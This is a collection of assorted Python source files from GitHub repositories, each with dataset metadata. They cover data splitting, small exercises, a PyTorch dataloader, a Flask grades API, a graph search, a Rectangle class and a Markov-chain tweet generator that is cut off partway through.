split_original_parsed_dataset(number_weeks_training, name_parsed_dataset_csv):\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n import time\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n start_time = time.time()\r\n\r\n data_and_scripts_location = all_paths()\r\n parsed_data_path = data_and_scripts_location[\"Data/parsed\"]\r\n\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n import pandas as pd\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n\r\n DF = pd.read_csv(parsed_data_path + \"/\" + name_parsed_dataset_csv, sep=',', low_memory = False)\r\n\r\n print(\"Start splitting the dataset...\")\r\n\r\n requiredFeatures = ['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit','Submit',\"Weekday\",\"WeekNumber\",\"sin(Weekday)\",\"cos(Weekday)\",\"Dayminute\",\"sin(Dayminute)\",\"cos(Dayminute)\",'QueueTime']\r\n workingDataset = DF.loc[:,requiredFeatures]\r\n necessaryFeatures = ['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit',\"Weekday\",\"sin(Weekday)\",\"cos(Weekday)\",\"Dayminute\",\"sin(Dayminute)\",\"cos(Dayminute)\",'QueueTime']\r\n totalweeks = workingDataset[\"WeekNumber\"].values[-1]\r\n totalsize = len(workingDataset[\"WeekNumber\"])\r\n \r\n\r\n # Make training dataset\r\n # weeks_training = 5\r\n weeks_training = number_weeks_training\r\n l_wn = workingDataset[\"WeekNumber\"].values <= weeks_training\r\n sheetSize = len(workingDataset[\"WeekNumber\"].loc[l_wn])\r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n output = parsed_data_path + \"/training_set_size=\"+ str(sheetSize) +\"_weeks=\"+ str(weeks_training) +\".csv\"\r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n workingDataset[necessaryFeatures].loc[l_wn].to_csv(output, sep=\",\",index=False)\r\n\r\n print(\"\\nDateset consisting of %i entries and %i weeks split into:\\n 1 training set of %i entries equivalent to %i weeks of job submissions\\n\"%(totalsize,totalweeks,sheetSize,weeks_training))\r\n\r\n # Make test sets\r\n number_test_sets = len(range(weeks_training+1,int(totalweeks)))\r\n print(\" %i Test sets for each of the following weeks:\"% number_test_sets)\r\n for w in range(weeks_training+1,int(totalweeks)):\r\n l_wn_tests = workingDataset[\"WeekNumber\"].values == w\r\n sheetSize = len(workingDataset[\"WeekNumber\"].loc[l_wn_tests])\r\n workingDataset[necessaryFeatures].loc[l_wn_tests].to_csv(parsed_data_path + \"/test_set_size=\"+ str(sheetSize) +\"_week=\"+ str(w) +\".csv\", sep=\",\",index=False)\r\n print(\" %i entries equivalent to %i week of job submissions\"%(sheetSize,1))\r\n\r\n\r\n print(\"Splitting complete. Total time needed:\")\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n \r\n print(\"Ouput: %s\"%output)\r\n \r\n return output","repo_name":"uoparaji/HPC-Forecaster","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42235435120","text":"def averange_lenght(name):\r\n #lets do not create another variable for storing\r\n av = 0\r\n with open(name, 'r') as f:\r\n for index, line in enumerate(f):\r\n words = [word.strip() for word in line.split()]\r\n av += sum(len(word) for word in words)\r\n\r\n number_of_words = len(words)\r\n if index != 0:\r\n number_of_words += 1\r\n av = av/number_of_words\r\n return av\r\n\r\nfile_name = input(\"Please enter filename:\")\r\n#file_name = 'words.txt'\r\nprint(averange_lenght(file_name))\r\n\r\n","repo_name":"Boberkraft/python","sub_path":"simple-python-ex46/38. Average word lenght.py","file_name":"38. Average word lenght.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40881894285","text":"from itertools import combinations\n\ndef gcd(a, b):\n while b:\n a, b = b, a % b\n return a\n\nt = int(input())\nfor _ in range(t):\n data = list(map(int, input().split()))\n data = data[1:]\n answer = 0\n for a, b in list(combinations(data, 2)):\n answer += gcd(a, b)\n print(answer)","repo_name":"parkgr95/Algorithm-Baekjoon","sub_path":"임시/9613.py","file_name":"9613.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14954913107","text":"GRAPHITE_ENDPOINT = \"qa-api-performance-graphite\"\n\nrecord_count = {\n \"Smoke\": 10,\n \"100K\": 100000,\n \"500K\": 500000,\n \"1M\": 1000000,\n \"5M\": 5000000,\n \"10M\": 10000000\n}\n\ndata_class = [\n \"cancer_assessment\",\n \"clinical_test_result\",\n \"department\",\n \"encounter\",\n \"imaging\",\n \"medication_admin\",\n \"medication_order\",\n \"patient\",\n \"patient_condition\",\n \"performance_status\",\n \"procedure_order\",\n \"protocol\",\n \"provider\",\n \"surgery\",\n \"test_order\",\n \"treatment_plan\"\n]\n\n","repo_name":"devdasgupta/qa-data-migration-performance","sub_path":"script/utility/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1995041779","text":"import os\nimport sqlalchemy\nimport api.utils.logger as log_util\n\nlogger = log_util.get_logger(__name__, 'INFO')\n\n\ndef get_engine(database_name):\n engine = sqlalchemy.create_engine(f\"mysql+pymysql://{os.getenv('db_user')}:{os.getenv('db_password')}@{os.getenv('db_host')}/{database_name}\")\n return engine\n\n\ndef init_database(database_name):\n engine = get_engine(database_name=database_name)\n\n create_tables = [\n \"tbl_user\",\n \"tbl_ball_team\",\n \"tbl_fantasy_team\",\n \"tbl_fantasy_team_user_mtm\",\n \"tbl_player\",\n \"tbl_draft_event\",\n \"tbl_game\",\n \"tbl_box_score_line_item\"\n ]\n\n create_views = [\n \"vw_roster\",\n \"vw_team_ownership\"\n ]\n\n for table in create_tables:\n\n with open(f\"{os.getcwd()}/src/model/schema/{table}.sql\", 'r') as file:\n ddl = file.read()\n\n logger.info(f'Creating table {table}')\n\n with engine.connect() as conn:\n try:\n conn.execute(ddl)\n except Exception as e:\n logger.error(e)\n logger.info(f\"Failed to create table {table}\")\n\n for view in create_views:\n\n with open(f\"{os.getcwd()}/src/model/view/{view}.sql\", 'r') as file:\n ddl = file.read()\n\n logger.info(f'Creating view {table}')\n with engine.connect() as conn:\n conn.execute(ddl)\n","repo_name":"benvneal88/ncaa-bb-fantasy-manager","sub_path":"services/app/src/api/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21746775659","text":"\"\"\" 测试 __subclasshook__ 方法\n\nRenderer1 没有相关方法,返回为 False\n>>> class Renderer1:\n... pass\n...\n>>> isinstance(Renderer1(), Renderer)\nFalse\n\n\nRenderer2 有相关方法,返回为 True\n>>> class Renderer2:\n... def header(self):\n... pass\n...\n... def paragraph(self):\n... pass\n...\n... def footer(self):\n... pass\n...\n>>> isinstance(Renderer2(), Renderer)\nTrue\n\n\n相关方法也可以是属性\n>>> class Renderer3:\n... header = None\n... paragraph = None\n... footer = None\n...\n>>> isinstance(Renderer3(), Renderer)\nTrue\n\"\"\"\n\nimport abc\nimport collections\n\n\nclass Renderer(metaclass=abc.ABCMeta):\n\n @classmethod\n def __subclasshook__(Class, Subclass):\n \"\"\"可以在无须继承特定基类的前提下,创建出某套符合接口的对象\"\"\"\n if Class is Renderer:\n # 调用 Subclass.__mro__() 方法\n # 遍历 Subclass 及其超类的 Superclass.__dict__\n attributes = collections.ChainMap(\n *(Superclass.__dict__ for Superclass in Subclass.__mro__))\n # 将待检测的方法放在一个元组中\n methods = (\"header\", \"paragraph\", \"footer\")\n # 遍历元组中的方法,判断这些方法是不是都在 attributes 映射表中\n if all(method in attributes for method in methods):\n # 如果 methods 中每个方法都在 attributes 映射表里,那就返回 True\n return True\n # 通过 Class 参数判断自己是不是在 Renderer 类上调用\n # 不是则返回 NotImplemented\n return NotImplemented\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"AngelLiang/pipeg","sub_path":"ch02/ch02_01-adapter/subclasshook.py","file_name":"subclasshook.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6103126393","text":"from skimage import transform\nimport re\nimport numpy as np\nimport cv2\n\nPREFIX = 'rot'\nREGEX = re.compile(r\"^\" + PREFIX + \"_(?P-?[0-9]+)\")\n\nclass Rotate:\n def __init__(self, angle):\n self.angle = angle\n self.code = PREFIX + str(angle)\n\n def process(self, img):\n #return transform.rotate(img, -self.angle)\n rows,cols,ch = img.shape\n\n #M = np.float32([[1,0,2],[0,1,4]])\n #dst = cv2.warpAffine(img,M,(cols,rows))\n\n M = cv2.getRotationMatrix2D((cols/2,rows/2),self.angle,1.0)\n dst = cv2.warpAffine(img,M,(cols,rows))\n\n return(dst)\n\n @staticmethod\n def match_code(code):\n match = REGEX.match(code)\n if match:\n d = match.groupdict()\n return Rotate(int(d['angle']))\n","repo_name":"zzvvmm/image-augmentor","sub_path":"ops/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41828693586","text":"from torch import nn\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport os\nimport torchvision.transforms as T\nfrom split_dataset import train_test_file\n\n\ndef get_dataloader():\n\n DATA_DIR = 'main/'\n\n class APN_Dataset(Dataset):\n def __init__(self, df, transform=None):\n self.df = df\n self.transform = transform\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n\n row = self.df.iloc[idx]\n A_img = Image.open(os.path.join(\n DATA_DIR, row.Anchor)).convert(\"RGB\")\n P_img = Image.open(os.path.join(\n DATA_DIR, row.Positive)).convert(\"RGB\")\n N_img = Image.open(os.path.join(\n DATA_DIR, row.Negative)).convert(\"RGB\")\n\n label = row.Label\n\n if self.transform:\n A_img = self.transform(A_img)\n P_img = self.transform(P_img)\n N_img = self.transform(N_img)\n\n return A_img, P_img, N_img, label\n\n ImageNet_Mean_Std = ([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\n size = 224\n\n transformer_train = T.Compose([\n T.Resize(size),\n T.RandomVerticalFlip(0.4),\n T.RandomHorizontalFlip(0.4),\n T.RandomAdjustSharpness(sharpness_factor=2),\n T.RandomAutocontrast(),\n T.CenterCrop(size),\n T.ToTensor(),\n T.Normalize(*ImageNet_Mean_Std)\n ])\n\n transformer_test = T.Compose([\n T.Resize(size),\n T.CenterCrop(size),\n T.ToTensor(),\n T.Normalize(*ImageNet_Mean_Std)\n ])\n\n train_df, test_df = train_test_file()\n trainset = APN_Dataset(train_df, transformer_test)\n\n return trainset\n","repo_name":"ornob011/Abdomen_Expert","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28620707488","text":"import torch\nimport os\nimport argparse\nimport sys\nimport numpy as np\n\ndef get_args():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"output_folder\", type = str, help='the folder name for this prepped model')\n\targs = parser.parse_args()\n\treturn args\n\n\nargs = get_args()\nprint(args)\noutput_folder = args.output_folder\n\nsys.path.insert(0, os.path.abspath('../prepped_models/%s'%output_folder))\n\nos.chdir(os.path.abspath('../prepped_models/%s'%output_folder))\nimport prep_model_params_used as params\nos.chdir('../../prep_model_scripts')\n\nmodel = params.model\n\n\ndef get_kernels_Conv2d_modules(module,kernels=[]): \n\tfor layer, (name, submodule) in enumerate(module._modules.items()):\n\t\t#print(submodule)\n\t\tif isinstance(submodule, torch.nn.modules.conv.Conv2d):\n\t\t\tkernels.append(submodule.weight.cpu().detach().numpy())\n\t\telif len(list(submodule.children())) > 0:\n\t\t\tkernels = get_kernels_Conv2d_modules(submodule,kernels=kernels) #module has modules inside it, so recurse on this module\n\n\treturn kernels\n\n#function for return a kernels inhibition/exhitation value, normalized between -1 and 1\ndef gen_kernel_posneg(kernels):\n kernel_colors = []\n for i, layer in enumerate(kernels):\n average = np.average(np.average(layer,axis=3),axis=2)\n absum = np.sum(np.sum(np.abs(layer),axis=3),axis=2)\n unnormed_layer_colors = average/absum\n #normalize layer between -1 and 1\n normed_layer_colors = 2/(np.max(unnormed_layer_colors)-np.min(unnormed_layer_colors))*(unnormed_layer_colors-np.max(unnormed_layer_colors))+1\n kernel_colors.append(normed_layer_colors)\n return kernel_colors\n\n#function that takes kernel posneg values from -1 to 1 and returns rgba values\ndef posneg_to_rgb(kernel_posneg,color_anchors = [[10, 87, 168],[170,170,170],[194, 0, 19]]):\n \n #define a function for converting 'p' values between 0 and 1 to a 3 color vector\n color_anchors = np.array(color_anchors)\n def f(p,color_anchors=color_anchors):\n if p < .5:\n return np.rint(np.minimum(np.array([255,255,255]),color_anchors[1] * p * 2 + color_anchors[0] * (0.5 - p) * 2))\n else:\n return np.rint(np.minimum(np.array([255,255,255]),color_anchors[2] * (p - 0.5) * 2 + color_anchors[1] * (1 - p) * 2))\n #fnp = np.frompyfunc(f,1,1) \n fnp = np.vectorize(f,signature='()->(n)') \n\n kernel_colors = []\n for i, layer in enumerate(kernel_posneg):\n #nonlinear color interpolation\n ps = (layer+1)/2\n #ps = 1/(1+np.exp(-2*layer))\n kernel_colors.append(fnp(ps))\n return kernel_colors\n\n\n\nkernels = get_kernels_Conv2d_modules(model)\nkernel_posneg = gen_kernel_posneg(kernels)\nkernel_colors = posneg_to_rgb(kernel_posneg)\n\nall_dict = {'kernels':kernels,\n\t\t\t'kernels_posneg':kernel_posneg,\n\t\t\t'kernel_colors':kernel_colors}\n\ntorch.save(all_dict,'../prepped_models/'+params.output_folder+'/kernels.pt')\n\n","repo_name":"chrishamblin7/viscnn","sub_path":"prep_model_scripts/get_kernels.py","file_name":"get_kernels.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"30038020146","text":"from flask import Blueprint, jsonify, request, g\r\nfrom app.db import get_db\r\n\r\nbp = Blueprint(\"grades\", __name__, url_prefix=\"/api/grades\")\r\n\r\n@bp.route(\"\", methods=[\"GET\"])\r\ndef get_grades():\r\n db = get_db()\r\n grades = db.execute(\"SELECT * FROM grades\").fetchall()\r\n return jsonify([dict(grade) for grade in grades])\r\n\r\n@bp.route(\"\", methods=[\"POST\"])\r\ndef create_grade():\r\n db = get_db()\r\n data = request.get_json()\r\n student_id = data.get(\"student_id\")\r\n course_id = data.get(\"course_id\")\r\n grade = data.get(\"grade\")\r\n if student_id is None:\r\n return jsonify({\"error\": \"Student ID is required\"}), 400\r\n if course_id is None:\r\n return jsonify({\"error\": \"Course ID is required\"}), 400\r\n if grade is None:\r\n return jsonify({\"error\": \"Grade is required\"}), 400\r\n db.execute(\"INSERT INTO grades (student_id, course_id, grade) VALUES (?, ?, ?)\", (student_id, course_id, grade))\r\n db.commit()\r\n return jsonify({\"message\": \"Grade created successfully\"})\r\n\r\n@bp.route(\"/\", methods=[\"GET\"])\r\ndef get_grade(id):\r\n db = get_db()\r\n grade = db.execute(\"SELECT * FROM grades WHERE id = ?\", (id,)).fetchone()\r\n if grade is None:\r\n return jsonify({\"error\": \"Grade not found\"}), 404\r\n return jsonify(dict(grade))\r\n\r\n@bp.route(\"/\", methods=[\"PUT\"])\r\ndef update_grade(id):\r\n db = get_db()\r\n data = request.get_json()\r\n student_id = data.get(\"student_id\")\r\n course_id = data.get(\"course_id\")\r\n grade = data.get(\"grade\")\r\n if student_id is None:\r\n return jsonify({\"error\": \"Student ID is required\"}), 400\r\n if course_id is None:\r\n return jsonify({\"error\": \"Course ID is required\"}), 400\r\n if grade is None:\r\n return jsonify({\"error\": \"Grade is required\"}), 400\r\n db.execute(\"UPDATE grades SET student_id = ?, course_id = ?, grade = ? WHERE id = ?\", (student_id, course_id, grade, id))\r\n db.commit()\r\n return jsonify({\"message\": \"Grade updated successfully\"})\r\n\r\n@bp.route(\"/\", methods=[\"DELETE\"])\r\ndef delete_grade(id):\r\n db = get_db()\r\n db.execute(\"DELETE FROM grades WHERE id = ?\", (id,))\r\n db.commit()\r\n return jsonify({\"message\": \"Grade deleted successfully\"})\r\n\r\n ","repo_name":"adekunle8032/Altschool-third-semester-project2","sub_path":"app/students_api/routes/grades.py","file_name":"grades.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43119551939","text":"# Python3 program for Bidirectional BFS \n# Search to check jalur between two vertices\n\n# Pendefinisian Class dari node\n# untuk ditambahkan pada graph\nclass AdjacentNode:\n\t\n\tdef __init__(self, vertex):\n\t\t\n\t\tself.vertex = vertex\n\t\tself.next = None\n\n# Implementasi BidirectionalSearch\nclass BidirectionalSearch:\n\t\n\tdef __init__(self, jumlahNode):\n\t\t\n\t\t# Simpan jumlah node\n\t\t# siapkan list untuk menyimpan node\n\t\tself.jumlahNode = jumlahNode\n\t\tself.graph = [None] * self.jumlahNode\n\t\t\n\t\t# Inisialisasi queue untuk forward search \n\t\t# dan backward search\n\t\tself.src_queue = list()\n\t\tself.dest_queue = list()\n\t\t\n\t\t# Inisialisasi node yang telah dikunjungi dari forward dan \n\t\t# backward search as False\n\t\tself.src_visited = [False] * self.jumlahNode\n\t\tself.dest_visited = [False] * self.jumlahNode\n\t\t\n\t\t# Inisialisasi parent node dari source \n\t\t# dan destination\n\t\tself.src_parent = [None] * self.jumlahNode\n\t\tself.dest_parent = [None] * self.jumlahNode\n\t\t\n\t# Fungsi untuk menambahkan undirected edge/garis\n\tdef tambah_garis(self, src, dest): \n\t\t\n\t\t# Menambahkan edge pada graf\n\t\t\n\t\t# Tambah source ke destination\n\t\tnode = AdjacentNode(dest) \n\t\tnode.next = self.graph[src] \n\t\tself.graph[src] = node \n\n\t\t# Karena graph bersifat undirected, tambah\n\t\t# destination ke source\n\t\tnode = AdjacentNode(src)\n\t\tnode.next = self.graph[dest]\n\t\tself.graph[dest] = node\n\t\t\n\t# Fungsi untuk Breadth First Search \n\tdef bfs(self, direction = 'forward'):\n\t\t\n\t\tif direction == 'forward':\n\t\t\t\n\t\t\t# BFS secara forward\n\t\t\tcurrent = self.src_queue.pop(0)\n\t\t\tconnected_node = self.graph[current]\n\t\t\t\n\t\t\twhile connected_node:\n\t\t\t\tvertex = connected_node.vertex\n\t\t\t\t\n\t\t\t\tif not self.src_visited[vertex]:\n\t\t\t\t\tself.src_queue.append(vertex)\n\t\t\t\t\tself.src_visited[vertex] = True\n\t\t\t\t\tself.src_parent[vertex] = current\n\t\t\t\t\t\n\t\t\t\tconnected_node = connected_node.next\n\t\telse:\n\t\t\t\n\t\t\t# BFS secara backward\n\t\t\tcurrent = self.dest_queue.pop(0)\n\t\t\tconnected_node = self.graph[current]\n\t\t\t\n\t\t\twhile connected_node:\n\t\t\t\tvertex = connected_node.vertex\n\t\t\t\t\n\t\t\t\tif not self.dest_visited[vertex]:\n\t\t\t\t\tself.dest_queue.append(vertex)\n\t\t\t\t\tself.dest_visited[vertex] = True\n\t\t\t\t\tself.dest_parent[vertex] = current\n\t\t\t\t\t\n\t\t\t\tconnected_node = connected_node.next\n\t\t\t\t\n\t# Cek apakah ada vertex yang berpotongan dari\n\t# backward search dan forward search \n\tdef is_intersecting(self):\n\t\t\n\t\t# Mengembalikan pada node mana perpotongannya\n\t\t# jika tidak ada maka kembalikan 1\n\t\tfor i in range(self.jumlahNode):\n\t\t\tif (self.src_visited[i] and\n\t\t\t\tself.dest_visited[i]):\n\t\t\t\treturn i\n\t\t\t\t\n\t\treturn -1\n\n\t# Print jalur dari sumber ke target\n\tdef print_jalur(self, intersecting_node, \n\t\t\t\tsrc, dest):\n\t\t\t\t\t\t\n\t\t# Print jalur akhir dari \n\t\t# source ke destination\n\t\tjalur = list()\n\t\tjalur.append(intersecting_node)\n\t\ti = intersecting_node\n\t\t\n\t\twhile i != src:\n\t\t\tjalur.append(self.src_parent[i])\n\t\t\ti = self.src_parent[i]\n\t\t\t\n\t\tjalur = jalur[::-1]\n\t\ti = intersecting_node\n\t\t\n\t\twhile i != dest:\n\t\t\tjalur.append(self.dest_parent[i])\n\t\t\ti = self.dest_parent[i]\n\t\t\t\n\t\tprint(\"***** Jalur *****\")\n\t\tjalur = list(map(str, jalur))\n\t\t\n\t\tprint(' '.join(jalur))\n\t\n\t# Fungsi untuk bidirectional search \n\tdef bidirectional_search(self, src, dest):\n\t\t\n\t\t# Tambah source ke queue dan tandai \n\t\t# visited sebagai True dan tambahkan parent \n\t\t# sebagai -1\n\t\tself.src_queue.append(src)\n\t\tself.src_visited[src] = True\n\t\tself.src_parent[src] = -1\n\t\t\n\t\t# Tambah destination ke queue dan tandai \n\t\t# visited sebagai True dan tambahkan parent\n\t\t# sebagai -1\n\t\tself.dest_queue.append(dest)\n\t\tself.dest_visited[dest] = True\n\t\tself.dest_parent[dest] = -1\n\n\t\twhile self.src_queue and self.dest_queue:\n\t\t\t\n\t\t\t# BFS dari arah forward direction\n\t\t\tself.bfs(direction = 'forward')\n\t\t\t\n\t\t\t# BFS dari arah berlawanan\n\t\t\tself.bfs(direction = 'backward')\n\t\t\t\n\t\t\t# Cek node yang berpotongan\n\t\t\tintersecting_node = self.is_intersecting()\n\t\t\t\n\t\t\t# Jika node berpotonagan ada\n\t\t\t# maka jalur dari source ke destination ada\n\t\t\tif intersecting_node != -1:\n\t\t\t\tprint(f\"jalur ada antara {src} dan {dest}\")\n\t\t\t\tprint(f\"Berpotongan pada : {intersecting_node}\")\n\t\t\t\tself.print_jalur(intersecting_node, \n\t\t\t\t\t\t\t\tsrc, dest)\n\t\t\t\texit(0)\n\t\treturn -1\n\n# Driver code\nif __name__ == \"__main__\":\n\t\n\t# Benyak node di dalam graph\n\tn = 18\n\t\n\t# Start Node\n\tsrc = 3\n\t\n\t# End Node\n\tdest = 15\n\t\n\t# Buat Graph\n\tgraph = BidirectionalSearch(n)\n\tgraph.tambah_garis(0, 2)\n\tgraph.tambah_garis(1, 2)\n\tgraph.tambah_garis(2, 3)\n\tgraph.tambah_garis(3, 4)\n\tgraph.tambah_garis(3, 5)\n\tgraph.tambah_garis(5, 6)\n\tgraph.tambah_garis(5, 7)\n\tgraph.tambah_garis(5, 8)\n\tgraph.tambah_garis(8, 9)\n\tgraph.tambah_garis(8, 10)\n\tgraph.tambah_garis(10, 11)\n\tgraph.tambah_garis(11, 12)\n\tgraph.tambah_garis(11, 13)\n\tgraph.tambah_garis(10, 14)\n\tgraph.tambah_garis(14, 15)\n\tgraph.tambah_garis(15, 16)\n\tgraph.tambah_garis(14, 17)\n\n\n\t\n\tout = graph.bidirectional_search(src, dest)\n\t\n\tif out == -1:\n\t\tprint(f\"Tidak ada jalur penghubung antara node ke-{src} and ke-{dest}\")\n\n\n","repo_name":"modul60stis/ai-uts","sub_path":"Bidirectional search/BD.py","file_name":"BD.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13223951799","text":"#!/usr/bin/python3\n\"\"\"\nFile: rectangle.py\nDesc: This module contains a class, Rectangle\n\"\"\"\n\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"\n A class representing a rectangle.\n \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\"\n Initializes the Rectangle object.\n \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def __str__(self):\n \"\"\"\n Returns a string representation of the Rectangle.\n \"\"\"\n return f\"[Rectangle] ({self.id}) {self.x}/{self.y} - {self.width}/{self.height}\"\n\n def check_value(self, name, value, sides=True):\n \"\"\"\n Checks if the correct input was inserted for width, height, x, and y attributes.\n \"\"\"\n if type(value) != int:\n raise TypeError(f\"{name} must be an integer\")\n if sides:\n if value <= 0:\n raise ValueError(f\"{name} must be > 0\")\n elif value < 0:\n raise ValueError(f\"{name} must be >= 0\")\n\n @property\n def width(self):\n \"\"\"\n Getter for the width attribute.\n \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"\n Sets the value for the width attribute.\n \"\"\"\n self.check_value('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\"\n Getter for the height attribute.\n \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"\n Sets the value for the height attribute.\n \"\"\"\n self.check_value('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\"\n Getter for the x attribute.\n \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"\n Sets the value for the x attribute.\n \"\"\"\n self.check_value('x', value, False)\n self.__x = value\n\n @property\n def y(self):\n \"\"\"\n Getter for the y attribute.\n \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Sets the value for the y attribute.\n \"\"\"\n self.check_value('y', value, False)\n self.__y = value\n\n def area(self):\n \"\"\"\n Returns the area of the rectangle.\n \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\"\n Prints the Rectangle instance with the character '#'.\n \"\"\"\n print(\"\\n\" * self.__y, end='')\n for i in range(self.__height):\n print((' ' * self.__x) + ('#' * self.__width) + '\\n', end='')\n\n def update(self, *args, **kwargs):\n \"\"\"\n Updates the attribute values.\n \"\"\"\n if len(args):\n for n, arg in enumerate(args):\n if n == 0:\n self.id = arg\n elif n == 1:\n self.width = arg\n elif n == 2:\n self.height = arg\n elif n == 3:\n self.x = arg\n elif n == 4:\n self.y = arg\n else:\n if \"id\" in kwargs:\n self.id = kwargs[\"id\"]\n if \"width\" in kwargs:\n self.width = kwargs[\"width\"]\n if \"height\" in kwargs:\n self.height = kwargs[\"height\"]\n if \"x\" in kwargs:\n self.x = kwargs[\"x\"]\n if \"y\" in kwargs:\n self.y = kwargs[\"y\"]\n\n def to_dictionary(self):\n \"\"\"\n Returns the dictionary representation of the class.\n \"\"\"\n d = {}\n d[\"id\"] = self.id\n d[\"width\"] = self.width\n d[\"height\"] = self.height\n d[\"x\"] = self.x\n d[\"y\"] = self.y\n return d\n","repo_name":"Obifineprince/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74759044241","text":"import random\nimport emoji\nfrom tweet_counter import count_tweet\n\n#https://towardsdatascience.com/simulating-text-with-markov-chains-in-python-1a27e6d13fc6\n\ndef is_emojiblock(text):\n if len(text) <= 1:\n return False\n \n for character in text:\n if character not in emoji.UNICODE_EMOJI_ENGLISH:\n return False\n return True\n\ndef make_pairs(corpus):\n for i in range(len(corpus)-1):\n yield (corpus[i], corpus[i+1])\n\ndef make_trios(corpus):\n for i in range(len(corpus)-2):\n yield (corpus[i], corpus[i+1], corpus[i+2])\n\ndef mod_key(key):\n if is_emojiblock(key):\n return \"<|emojiblock|>\"\n else:\n return key.lower()\n\ndef load_corpus(filepath):\n text = open(filepath, encoding='utf8').read()\n\n corpus = text.split()\n\n emojiCorpus = []\n for i, t in enumerate(corpus):\n if is_emojiblock(t):\n corpus[i] = \"<|emojiblock|>\"\n emojiCorpus.append(t)\n\n emojiCorpus = '\\n'.join(emojiCorpus)\n \n pairs = make_pairs(corpus)\n trios = make_trios(corpus)\n emojiPairs = make_pairs(emojiCorpus)\n\n word_dict_one = {}\n word_dict_two = {}\n emoji_dict_one = {}\n\n for word_1, word_2 in pairs:\n word_1 = mod_key(word_1)\n if word_1 in word_dict_one.keys():\n word_dict_one[word_1].append(word_2)\n else:\n word_dict_one[word_1] = [word_2]\n\n for word_1, word_2, word_3 in trios:\n word_1 = mod_key(word_1)\n word_2 = mod_key(word_2)\n if (word_1, word_2) in word_dict_two.keys():\n word_dict_two[(word_1, word_2)].append(word_3)\n else:\n word_dict_two[(word_1, word_2)] = [word_3]\n\n for emoji_1, emoji_2 in emojiPairs:\n if emoji_1 in emoji_dict_one.keys():\n emoji_dict_one[emoji_1].append(emoji_2)\n else:\n emoji_dict_one[emoji_1] = [emoji_2]\n\n first_words = [w for w in list(word_dict_two) if w[0].lower().startswith(\"o\") or w[0].lower().startswith(\"g\")]\n random_word = [w for w in list(word_dict_one)]\n\n return (first_words, random_word, word_dict_one, word_dict_two, emoji_dict_one)\n\ndef generate_emojiblock(emoji_dict):\n emojiBlock = list(random.choice(emoji_dict['\\n']))\n while len(emojiBlock) < 6:\n next = random.choice(emoji_dict[emojiBlock[-1]])\n if next != '\\n':\n emojiBlock.append(next)\n else:\n break\n return ''.join(emojiBlock)\n\ndef generate_tweet(chain_data):\n first_words, random_word, word_dict_one, word_dict_two, emoji_dict_one = chain_data\n chain = list(random.choice(first_words))\n\n tweetText = \"\"\n while not \"<|endoftext|>\" in tweetText:\n lastOne = mod_key(chain[-1])\n lastTwo = mod_key(chain[-2])\n if len(lastOne) <= 3 and (lastTwo, lastOne) in word_dict_two.keys():\n chain.append(random.choice(word_dict_two[(lastTwo, lastOne)]))\n else:\n chain.append(random.choice(word_dict_one[lastOne]))\n \n if chain[-1] == \"<|endoftext|>\" and len(chain) < 4:\n if len(lastOne) <= 3 and (lastTwo, lastOne) in word_dict_two.keys():\n if len(list(filter(lambda x: not \"<|endoftext|>\" in x, 